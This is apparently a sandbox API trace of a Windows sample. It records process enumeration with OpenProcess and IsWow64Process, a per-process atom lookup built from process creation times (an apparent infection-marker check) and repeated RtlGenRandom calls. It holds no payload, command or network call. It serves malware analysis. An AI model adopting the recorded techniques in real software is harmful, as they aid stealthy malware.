	[0086.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0086.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.358] CloseHandle (hObject=0x69c) returned 1
	[0086.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0086.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.358] CloseHandle (hObject=0x69c) returned 1
	[0086.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0086.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.358] CloseHandle (hObject=0x69c) returned 1
	[0086.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0086.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.358] CloseHandle (hObject=0x69c) returned 1
	[0086.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0086.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.358] CloseHandle (hObject=0x69c) returned 1
	[0086.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0086.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0086.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.359] CloseHandle (hObject=0x69c) returned 1
	[0086.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0086.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.359] CloseHandle (hObject=0x69c) returned 1
	[0086.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0086.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.359] CloseHandle (hObject=0x69c) returned 1
	[0086.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0086.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0086.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.359] CloseHandle (hObject=0x69c) returned 1
	[0086.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0086.359] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.359] CloseHandle (hObject=0x69c) returned 1
	[0086.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0086.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.360] CloseHandle (hObject=0x69c) returned 1
	[0086.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0086.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.360] CloseHandle (hObject=0x69c) returned 1
	[0086.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0086.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.360] CloseHandle (hObject=0x69c) returned 1
	[0086.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0086.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.360] CloseHandle (hObject=0x69c) returned 1
	[0086.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0086.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.360] CloseHandle (hObject=0x69c) returned 1
	[0086.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0086.360] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.361] CloseHandle (hObject=0x69c) returned 1
	[0086.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0086.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.361] CloseHandle (hObject=0x69c) returned 1
	[0086.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0086.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.361] CloseHandle (hObject=0x69c) returned 1
	[0086.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0086.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.361] CloseHandle (hObject=0x69c) returned 1
	[0086.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0086.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.361] CloseHandle (hObject=0x69c) returned 1
	[0086.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0086.361] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.361] CloseHandle (hObject=0x69c) returned 1
	[0086.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0086.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.362] CloseHandle (hObject=0x69c) returned 1
	[0086.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0086.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.362] CloseHandle (hObject=0x69c) returned 1
	[0086.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0086.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.362] CloseHandle (hObject=0x69c) returned 1
	[0086.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0086.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.362] CloseHandle (hObject=0x69c) returned 1
	[0086.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0086.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.362] CloseHandle (hObject=0x69c) returned 1
	[0086.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0086.362] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.362] CloseHandle (hObject=0x69c) returned 1
	[0086.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.363] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.363] CloseHandle (hObject=0x69c) returned 1
	[0086.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.363] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.363] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0086.363] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0086.363] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0086.363] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.364] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0086.364] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.364] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0086.364] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0086.364] CloseHandle (hObject=0x69c) returned 1
	[0086.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0086.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0086.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0086.364] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.364] CloseHandle (hObject=0x69c) returned 1
	[0086.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0086.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0086.365] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.365] CloseHandle (hObject=0x69c) returned 1

Thread:
	id = 52
	os_tid = 0x814

	[0070.344] Sleep (dwMilliseconds=0x1388) 
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.386] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.387] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] GetLastError () returned 0x57
	[0075.388] LoadLibraryA (lpLibFileName="advapi32") returned 0x74aa0000
	[0075.389] GetProcAddress (hModule=0x74aa0000, lpProcName="SystemFunction036") returned 0x74682a60
	[0075.389] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.389] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.390] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.391] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.392] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.393] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] SystemFunction036 (in: RandomBuffer=0x292fc8c, RandomBufferLength=0x4 | out: RandomBuffer=0x292fc8c) returned 1
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
	[0075.394] GetLastError () returned 0x57
